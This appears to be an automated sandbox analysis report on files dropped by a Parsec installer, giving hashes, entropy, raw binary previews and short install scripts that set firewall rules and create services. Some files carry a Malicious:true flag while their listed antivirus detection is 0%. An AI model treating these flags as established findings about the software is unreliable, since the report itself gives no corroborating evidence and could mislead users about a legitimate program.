                              SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                              SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                              SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b

                              C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.inf

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):3005
                              Entropy (8bit):5.435819624452916
                              Encrypted:false
                              SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                              MD5:04F8C6A4C9D90818704596FFF273AD0E
                              SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                              SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                              SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                              Malicious:false
                              Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                              C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):263336
                              Entropy (8bit):6.416646624342821
                              Encrypted:false
                              SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                              MD5:591AB089C7184E33D0F4DB12B4CA5498
                              SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                              SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                              SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................

                              C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):104208
                              Entropy (8bit):7.574113550215517
                              Encrypted:false
                              SSDEEP:3072:hbG7N2kDTHUpouC0NIHo0Ym9eyOEn/y0PwqVMARM:hbE/HU60uI0YAOE/y0mARM
                              MD5:B28AE314664A7E74B8A7A83DF3002539
                              SHA1:3043970C1DA7412C4CE0CCEF44E51AB0698A338B
                              SHA-256:FA1BF84A9D14DC4026ACF706539282F5E3FE1898AF24A2465B6837903FD0158C
                              SHA-512:A36F257A455D2536E7CE3C493745284F0878DC874DCE99D4BC4778A058C7E2EDD67BD21776C7386E36D71FE00BAD1B495F6FF0CEC5838ABFB55EA3D12E8AC10D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................t.....@..........................................................m...)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                              C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):327
                              Entropy (8bit):4.820064645392393
                              Encrypted:false
                              SSDEEP:6:xzKmgiItAnsKg9r/zITrId6T6UilzKmXBux3jwXvL+Hvt0zKmtcowXMEfsE1:xzAiI+sKg9bzITcdRfz3ajwXDQ0zN1wh
                              MD5:3B3CA1091EB59F0FA9ED9C9A50B3BF81
                              SHA1:BD3A9CCCD279E4FFF79AE840D6397B1E8AB8CBA0
                              SHA-256:94EE200CA574DD4499779048DB279264C872833C96A500E0F49B1342EE5F4802
                              SHA-512:8F86DB66C0BFC7E043EED738CF026ACF6AEAD862410A17FE02A2E26FDEB77B59A1162B1D67868A428F9B0C604A31963CBA8EF534B25AF1BC60448424CA6CCD1B
                              Malicious:false
                              Preview:start /wait nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000".start /wait nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf".start /wait nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf".

                              C:\Program Files\Parsec Virtual USB Adapter Driver\vusbuninstall.bat

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):312
                              Entropy (8bit):4.829934939966026
                              Encrypted:false
                              SSDEEP:6:xzKmuIUiItAnsKS/sWITrId6T63zKm6Bux3jwXvL+Hvt0zKmtcPwXMEfsE1:xznUiI+sK0sWITcdR3zaajwXDQ0zNOwh
                              MD5:8E8F18F9109FCC7B93B2770BE222FA53
                              SHA1:E49D59E3161E33DE73D96AD95B41A1EA979C5C06
                              SHA-256:E5A72F8064DE9B266CED03C042DAEF6BA9682CF0BA66BF8236E30E6169E88F0E
                              SHA-512:26402EC20431AC71469B6F886C00183A30F2E8F5009004B9BAD54C5A6AFDEA88AAA56E567CE048A35A76655F9AAA8D86CF69A35AA951786F8A0DA933B7F311C5
                              Malicious:false
                              Preview:start /wait nefconw.exe --remove-device-node --hardware-id Root\Parsec\VUSBA --class-guid 36fc9e60-c465-11cf-8056-444553540000.start /wait nefconw.exe --uninstall-driver --inf-path ".\parsecvusba\parsecvusba.inf".start /wait nefconw.exe --inf-default-uninstall --inf-path ".\parsecvirtualds\parsecvirtualds.inf".

                              C:\Program Files\Parsec\parsecd.exe

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):465792
                              Entropy (8bit):5.186344682321096
                              Encrypted:false
                              SSDEEP:6144:rkdyuNAbS9p400tm61bXdCwx+3y6kR1DnjvGms7X5od0:rkUuNAbS9p9cx1rdCwh6+/+msjmd0
                              MD5:62BEB668110B4C5DDAD09BB20D921CB6
                              SHA1:F3706372C01D1E607FF8C605307DE6EF2C26C1A4
                              SHA-256:6F1BE9E26E403A885CC3B1FF0E4DBECBC96C0821119D25990C3E211564F215D5
                              SHA-512:8994C3F1C78B0A816ECF30E463AF8D6DDFD0A0CE7B962CBF13E9BBD360D37A024B8EE69C76745F4C332A4786DBFB9216667B1D03C32C60A7C06E85359A2186EE
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'...c.]c.]c.]j..]a.]...\b.]...\R.]c.]%.]...\..]...\d.]...\v.]1..\K.]1..\p.]1..\d.]...\C.]...\f.]..c]b.]c..]a.]...\b.]Richc.]........................PE..d.....7e.........."......J..........(..........@.............................P............`..................................................P...........n...............)...@......0...........................(...P...8............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....2...`.......L..............@....pdata...............Z..............@..@_RDATA...............x..............@..@.rsrc....n.......p...z..............@..@.reloc.......@......................@..B................................................................................................................................................................

                              C:\Program Files\Parsec\pservice.exe

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):418696
                              Entropy (8bit):4.95147545386253
                              Encrypted:false
                              SSDEEP:6144:qaoZkv+B1x9heMY32Z4iZDzDJGjvGms7X5Hm:4Zkv+B1x9cMu2ZzS+msjZ
                              MD5:46CD3FC327AF9109BD143BA7F16DF397
                              SHA1:53D2A6BCF0D21168050B852E287C2EF62F52F909
                              SHA-256:5A699A165838C739E449AC19A52E0A05B841BCEE1A27F7D348F0DD04C8E277A3
                              SHA-512:D6E35F0DD4F6EF259DD7040D80CD469F27EB460836A4C767D40678CE82B46CE4C38B329C0CF3B41236CEA2F0333F94669CFBEF05EF484D91035F52AD4C1A5CA3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."R.tL..tL..tL......tL.2.J..tL.2.M..tL..tM..uL.2.I.TtL.2.O..tL.2.H..tL...I..tL...H..tL...O..tL.).H..tL.).D..tL.)....tL..t...tL.).N..tL.Rich.tL.........PE..d.....7e..........".................Pk.........@.....................................J....`.................................................L........0...f...........:...)..........Ld.......................f..(...pd..8...............@............................text... ........................... ..`.rdata..............................@..@.data...@2..........................@....pdata..............................@..@_RDATA....... ......................@..@.rsrc....f...0...h..................@..@.reloc...............2..............@..B................................................................................................................................................................................

                              C:\Program Files\Parsec\skel\appdata.json

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):155
                              Entropy (8bit):4.964195012666818
                              Encrypted:false
                              SSDEEP:3:3FFgNicHnIhoF1ExnRGTAWAJlBRoWdxETzqSHXCF8K/NkPUAA6An:3FFgN/HIaOxnR8VAPBRiqfGomTA6An
                              MD5:2C669AF7EE4ADEDDF72FA0102AA0378D
                              SHA1:5FCDF2480946EEF8F55DAA2DF5522508E45DECCD
                              SHA-256:CD5D52066766B7F0FD7222E551A96C539F17C72DEBD32F8DA9F76DF4627A6DD5
                              SHA-512:553CAECE520111CAB22BB8E92099A2976ACD7F2DC8C8766227F8D64259CC9E3104ADF1B10019B25EDB3A05B92A64AFE5466C661F88BF33F2ECACDA4FE6EDC32F
                              Malicious:false
                              Preview:{.. "entry_symbol": "wx_main",.. "hash": "b43debe8105cfd4e2c8f81599497ad4ad38640f19a64f9e530e7d2f64662bf6d",.. "so_name": "parsecd-150-93b.dll"..}

                              C:\Program Files\Parsec\skel\parsecd-150-93b.dll

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):3445128
                              Entropy (8bit):6.632135432033706
                              Encrypted:false
                              SSDEEP:49152:UWvLIUXeaP9CAYaXaAndGk4L8jTMFv43/ruceDSbsRCy9uzY9eQoYVe0OUrVxkov:0I0jNdLrpEeD+vqBlMe
                              MD5:1FF3E1349EDD37A206A97943731045C4
                              SHA1:6D1CFC0C0B26191385CB27149433E743B74D479A
                              SHA-256:B43DEBE8105CFD4E2C8F81599497AD4AD38640F19A64F9E530E7D2F64662BF6D
                              SHA-512:80F91692C22587E76E26C7CA38B267493D4598BCE75E284B3FEF4EF03C64EF8BA91D67BB7BE2BDDD9624E4AA52A67BDEB4B5EAC3A86A31529BB18C44F5824FE6
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...................................`...........!..L.!This program cannot be run in DOS mode....$...........Mx..Mx..Mx..D.Z.Ox......Lx.......x..Mx...z......x......lx......jx..Mx..Lx..K...+x..K...]x..K...[x......Nx......Nx.....Xx......Ax......Lx.......x..j...Gx.. ...xx.. ...5x.. ...Lx.. .6.Lx..Mx^.Ox.. ...Lx..RichMx..........PE..d...X..e.........." ...&.\....................................................5......4...`......................................... $/.h....$/......02..n....0.|1...h4..)....5.h....A-......................C-.(....@-.@............p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....1...`/..0...P/.............@....pdata..|1....0..2..../.............@..@.detourc.!....1.."....0.............@..@.detourd......2.......0.............@..._RDATA..0.... 2.......0.............@..@.rsrc....n...02..p....0.............@..@.reloc..h.....5......R4.............@..B........................

                              C:\Program Files\Parsec\teams.exe

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):350968
                              Entropy (8bit):5.604356925971176
                              Encrypted:false
                              SSDEEP:6144:GAR9duE83BYjyEbU1SDgFg8EwkSdbAxD22y6jvGmp:H9gp3WjyEbU1SDAgJw40c+mp
                              MD5:FAA24223985ABFBF64E4DDCD43F062D3
                              SHA1:E1374DC7C98405EFC5A44AA3229B97EABDD69BB2
                              SHA-256:6DC71B2E92B770DCFECA4A32C8F1787210311F731F1124754DF193EC22D5D13E
                              SHA-512:23324AFCB51508F5EA3F120A5787B150A8226D677C5A55FEF219674B4D619FD0D7300D2B4CAD917864D5F54788B9C8546DB2A77AA4F0D666A956014169C4A6C9
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{'Z\.I.\.I.\.I..hO.].I..hH.G.I.\.H...I..hL...I..hJ.[.I..hM.S.I..oL.t.I..oM.O.I..oJ.[.I..oM.I.I..o..].I.\...].I..oK.].I.Rich\.I.........................PE..d.....bb.........."......`..........@t.........@....................................V.....`.................................................tM..x.......0....... ....:... ......................................(.......8............p..P............................text... _.......`.................. ..`.rdata.......p.......d..............@..@.data...h/...`.......N..............@....pdata.. ............\..............@..@_RDATA...............z..............@..@.rsrc...0............|..............@..@.reloc...............2..............@..B................................................................................................................................................................................

                              C:\Program Files\Parsec\uninstall.exe

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):174136
                              Entropy (8bit):5.0044183901933215
                              Encrypted:false
                              SSDEEP:1536:Gg/T2X/jN2vxZz0DTHUpouk9pbZ3yFu1/s+ZLGmRTQ3E64xE+1x7wWNx:GgbG7N2kDTHUpoukTi+hGmRHxPxMW
                              MD5:FD4427B781E0DCB86E2FBC84BF000B36
                              SHA1:2A4F6C058D137F02D3A2E5D0A8E2A0A4C70EF81D
                              SHA-256:99864EAE2AD9B58075D0F4B2B3CF5B68BC35FE9E187B8695791F041C1335D5F1
                              SHA-512:EF593E0F7286ABFA1F0FE090CACAF4854F31B07E5A0DD39A87B87A4E28BFDC5A45A6A8406DF0578C503560BF5449CFDD65358EAA89C8E8BB7B64475E70DF09D3
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................... ............@..........................................P..X............~...)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...X....P......................@..@................................................................................................................................................................................................................................................................................................................................................

                              C:\Program Files\Parsec\vdd\parsec-vdd.exe

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):517256
                              Entropy (8bit):7.9435707600028005
                              Encrypted:false
                              SSDEEP:12288:QbLQNEFqf6MouZQqdF9zuAkDjdCjXHSZz2AKhAOYYA:QbUNEFKXrZ6ZjdFZxKhAOYv
                              MD5:4B9A3048286692A865187013B70F44E8
                              SHA1:EEFE91D9702314341ACCCD828FE4EDB6EE570D7B
                              SHA-256:E23332448FDAF5AA017CB308DB5EF6855FAC526A7DED05D80C039404126D5362
                              SHA-512:A38B9A0A1626D9F40FF2C718717A793108C7E773B25493CC53C595E6B9840CC4DE66587549F43CE00569B368834327184A90D55DA3C4AE0E269E1D0EDEF6238D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@..................................D....@..............................................................)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                              C:\Program Files\Parsec\vusb\parsec-vud.exe

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):907184
                              Entropy (8bit):7.983961364658659
                              Encrypted:false
                              SSDEEP:24576:Ib45b9QaRG2zB9aKXrZ6bcmH0q8qHFael5:CsuWGcjLzmUaHX
                              MD5:2D009D446A0BA83EC2F12242F7ED126C
                              SHA1:7E5346787E8950A8B3F17FB3F527E0F80055F059
                              SHA-256:436088A5EB416935D7BD452E4E53123C2E65B737EAB7D98EBE1913618F95E61B
                              SHA-512:1A3E761F5CB3AD8B4979D60D197AB5FF75929408DDB065080D687BE02A33058A953DFCB8F01E5B87332FE54CF578BED191122E57BB2F0D2FCF7A6874DFAF8A57
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................;.....@.........................................................(....)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                              C:\Program Files\Parsec\wscripts\firewall-add.vbs

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):307
                              Entropy (8bit):4.83986109060373
                              Encrypted:false
                              SSDEEP:6:jeUicmAN+7ysIkgOr39TksxYOpLzLYHHiRXZawuxAWFTOuJ85LLn:ixc3AAjA39TXppmHy0wBC6uJ8t
                              MD5:882374285898F16B5F9FF44AFC1AE701
                              SHA1:31C9445557C9B8ECDA1F0A6D5FF666E01DD1C3CA
                              SHA-256:0BE5AA5CC6395A86878F56B131E13DB4908E48F06E892FF8F8CF9E2D3B6C8ABB
                              SHA-512:3B05158B03B57A4D2CBFEE9CEF6ADFE973D080264A88E5CDEB85C59B567529CD1CD2A3B5D8538CB8637D140FD8691DC8826388AB669B7BFB2D5C1C4174069243
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args.Dim path..path = Wscript.Arguments(0)..args = "netsh.exe advfirewall firewall add rule name=Parsec dir=in action=allow program=""" & path & """ enable=yes profile=public,private,domain".sh.Run args, 0, true.

                              C:\Program Files\Parsec\wscripts\firewall-remove.vbs

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):367
                              Entropy (8bit):4.612954361510431
                              Encrypted:false
                              SSDEEP:6:jeUicmAN+7ysRT/mivYOLLLv8T/mivYTq7Lv8T/mivY1q7Ln:ixc3ApT/mivpLv8T/miviI8T/mivf
                              MD5:5D4D70CDF36FCDAA292DA1DA9133320C
                              SHA1:92DC18D3D1128D43F482AB56804136C687B00713
                              SHA-256:75F1DECE4FDA689A907F6D74B513ADB0C1771C1B79EA71160179542C9C4AB2F0
                              SHA-512:B54C92FBECB10DDF66D1B7AD950FFBC13F504C71081A8BD56C28C5689A2BF19BD81B467E0697C38F140C72A273EB9EB837105E738C6F1AC4F43344E2AB521778
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args..args = "netsh.exe advfirewall firewall delete rule name=Parsec".sh.Run args, 0, true..args = "netsh.exe advfirewall firewall delete rule name=parsec.exe".sh.Run args, 0, true..args = "netsh.exe advfirewall firewall delete rule name=parsecd.exe".sh.Run args, 0, true.

                              C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):115
                              Entropy (8bit):4.642094539330562
                              Encrypted:false
                              SSDEEP:3:jeYcRm81GX7Z9HCCoOWuu5G3RKLfObvn:jeUi+4uu5GcyLn
                              MD5:C78520C3162C1962F3164714B37EB4D0
                              SHA1:67C19B8AEA7AD99465976DBCD3EFCFDD7D62E3FE
                              SHA-256:DEA38BD553ABE93C689DE42D0220ADD18F9BE3E3D2FA53F97EB8649F586DF4F3
                              SHA-512:CFBFC2C7DD8019F98B77E8881680EF9D0135A210FB9B0136A4992C236D971E247AA1641CD2EAFDC5F6F5BB61002B30EA14B226127C4CEF04F3B3D6BE3A941FCC
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "schtasks /delete /tn ParsecTeams /f".sh.Run args, 0, true.

                              C:\Program Files\Parsec\wscripts\service-install.vbs

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):412
                              Entropy (8bit):4.864624018635759
                              Encrypted:false
                              SSDEEP:12:ixc3AAl7J2WjifH0//37ClesqAIN58CzA7n:iOAs7T//7D7AjG+n
                              MD5:971E2A344A6E17347A81EEB21ADA7BA7
                              SHA1:37E034C29ADDA9B118B75BFDC7C6F41AAC71E257
                              SHA-256:01F62A12DE3307B375DFF3EBCD6961D76FFCBC24F70682C7875655A811CE76A1
                              SHA-512:5EA0750DC07FF1A0EB1807043B48FB9ED54F6DCB96CE03CB543B0EA36D326779814B6CB87091373574911662A35D75B576E35C5B8D781DB36FE1503F8287C65D
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args.Dim path..If Wscript.Arguments.Count = 0 Then..path = fs.GetAbsolutePathName("") & "\pservice.exe".Else..path = Wscript.Arguments(0).End If..args = "sc.exe create Parsec binPath= ""\""" & path & "\"""" start= auto type= interact type= own".sh.Run args, 0, true..args = "sc.exe start Parsec".sh.Run args, 0, true.

                              C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):164
                              Entropy (8bit):4.745893446511344
                              Encrypted:false
                              SSDEEP:3:jeYcRm81GX7Z9HCCodNFfXSDoqObvv8oFKsocGAM4JqObvn:jeUi+C/SD+Lv81cXMq7Ln
                              MD5:F7B0C63E7AEA5CBD96F7BF1021B28B73
                              SHA1:FC5B11A6BF022740DE3BA15455B06AD3F061366B
                              SHA-256:71F9CC28497B959377439F6611615EF582745DD5B9CCA02B5C4B24BB1FC3DFB8
                              SHA-512:C957B7B45B188AF0B6E6698507E94564E8E5CCC8DBF5F0237827DF373878291095887422584F7F3B7833CBCDD682531FA75C974BA1137031B32BF2FFBA268191
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "sc.exe control Parsec 200".sh.Run args, 0, true..args = "taskkill /F /IM parsecd.exe".sh.Run args, 0, true.

                              C:\Program Files\Parsec\wscripts\service-remove.vbs

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):150
                              Entropy (8bit):4.521058872484995
                              Encrypted:false
                              SSDEEP:3:jeYcRm81GX7Z9HCCodNFNv1p+aObvv8odNFPmYaObvn:jeUi+CNj+LLv8CuYLLn
                              MD5:B90E75DD7903CB2D6328BB3714865C7A
                              SHA1:2D32868DEB198726ED5FEB80B66542BAD7FBACEE
                              SHA-256:970B3C2A9EA1906A177810990478932E3517F47ABA267CF2AB9E4BA65E7B475F
                              SHA-512:3D4BFB86EC98FD85843AE5B63DCF5F475C6500380F02BB4D0DEE15A5F7E2334ABDBBCD9420B8AC05B5BEB8A63B9EA16ABCD70AE01C04B87A423FC288FF4DCA0A
                              Malicious:false
                              Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "sc.exe stop Parsec".sh.Run args, 0, true..args = "sc.exe delete Parsec".sh.Run args, 0, true.

                              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Parsec\Parsec.lnk

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Mar 28 13:46:56 2024, mtime=Thu Nov 14 01:12:05 2024, atime=Thu Mar 28 13:46:56 2024, length=465792, window=hide
                              Category:dropped
                              Size (bytes):800
                              Entropy (8bit):4.581172484434597
                              Encrypted:false
                              SSDEEP:12:8XnXk1c0YXCh9WVdpF4412BEzYt0aYA+jAfcbdpW31l7LPBmV:8X0K7dAmYq5AfodIFJPBm
                              MD5:A0AC374B7DF1C8327EFE0FC2ACDA5A5A
                              SHA1:851B8C41EFBEBB8D8A292B44D5C9B9F8E8D9CEEC
                              SHA-256:C11B39EDDA121018EB9B13F5DE48C207F68307377934052FBD080EED792DAB98
                              SHA-512:7095ECE76FD687571E383C5EBFBF8894810067DB0164484C7F1134DFE9F98D99998804ED73A6F17577C9116D9C94DEAA0436AACEDC462BEDC8435232974E6FA1
                              Malicious:false
                              Preview:L..................F.... ....0......5&.:6...0..............................q....P.O. .:i.....+00.../C:\.....................1.....nY....PROGRA~1..t......O.InY......B...............J.......}.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....nY....Parsec..>......nY..nY...........................V/;.P.a.r.s.e.c.....b.2.....|X.u .parsecd.exe.H......|X.unY......i.........................p.a.r.s.e.c.d...e.x.e.......R...............-.......Q............v.......C:\Program Files\Parsec\parsecd.exe..2.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.P.a.r.s.e.c.\.p.a.r.s.e.c.d...e.x.e.`.......X.......061544...........hT..CrF.f4... .].T..b...,.......hT..CrF.f4... .].T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

